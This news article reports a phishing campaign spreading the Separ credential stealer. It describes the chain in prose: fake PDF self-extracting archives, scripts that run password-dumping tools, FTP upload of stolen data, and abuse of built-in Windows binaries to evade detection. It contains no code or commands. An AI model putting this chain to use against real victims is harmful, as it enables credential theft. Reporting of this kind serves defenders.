New Separ credential-stealing campaign abuses legit tools and executables

News by Bradley Barth

A new phishing campaign distributing the credential-stealing malware Separ has over the last few weeks reportedly affected hundreds of business organisations, primarily those located in Southeast Asia and the Middle East.

A new phishing campaign distributing the credential-stealing malware Separ has over the last few weeks reportedly affected hundreds of business organisations, primarily those located in Southeast Asia and the Middle East.

The malware has been uploading stolen data from infected entities on a daily basis, with additional targets based in North America, according to a 19 February corporate blog post authored by Guy Propper, a researcher with Deep Instinct.

Victims of the scam receive phishing emails featuring attachments in the form of fake PDF documents, which are actually self-extracting archives containing a series of files and collectively work to launch the Separ payload. These include a VBScript, two batch scripts and four executable files, some with names that appear to imitate Adobe.

Typically, the emails allude to pricing quotes, shipments and equipment specs in order to trick business recipients into opening these attachments. If they do, the self-extracting archive runs the VBScript, which in turn calls the first batch script, which sets up directories and copies certain files to them before producing the second batch script.

Among other malicious actions, the second batch script launches legitimate email and browser password-dumping tools from SecurityXploded in order to steal user credentials for exfiltration. Next, Separ abuses the legit FTP client ancp.exe to upload stolen files to the also legit hosting service freehostia.com.

The malware also abuses the legitimate executables xcopy.exe, attrib.exe and sleep.exe for its own nefarious purposes. "The [malicious] use of scripts and legitimate binaries, in a ‘Living off the Land’ scenario, means the attacker successfully evades detection, despite the simplicity of the attack," Propper explains.

"We were able to access the FTP server several times, and the growth in the number of victims was clearly visible, meaning the attack is ongoing and successfully infecting many victims," Propper continues, noting that stolen data has included "ipconfig results in addition to email and browser passwords."

This article was originally published on SC Media US.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming event